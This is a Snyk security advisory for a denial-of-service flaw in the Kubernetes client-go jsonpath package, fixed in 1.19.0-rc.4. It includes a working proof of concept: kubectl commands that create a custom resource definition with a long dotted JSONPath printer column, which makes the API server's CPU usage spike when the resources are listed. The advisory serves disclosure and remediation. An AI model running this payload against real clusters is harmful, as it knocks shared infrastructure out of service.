Denial of Service (DoS) Affecting github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath package, versions <1.19.0-rc.4
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMKUBERNETESKUBERNETESSTAGINGSRCK8SIOCLIENTGOUTILJSONPATH-597670
- published 24 Jul 2020
- disclosed 24 Jul 2020
- credit lazydog
How to fix?
Upgrade github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath
to version 1.19.0-rc.4 or higher.
Overview
github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath is an is a template engine using jsonpath syntax, which can be seen at http://goessner.net/articles/JsonPath/. In addition, it has {range} {end} function to iterate list and slice.
Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.
PoC
kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: foos.example.com
spec:
group: example.com
scope: Namespaced
names:
plural: foos
singular: foo
kind: Foo
version: v1
additionalPrinterColumns:
- name: FOO
type: string
JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
name: foo-cr
spec:
foo:
bar:
baz:
qux: data
EOF
kubectl get foo
The API server CPU usage significantly increases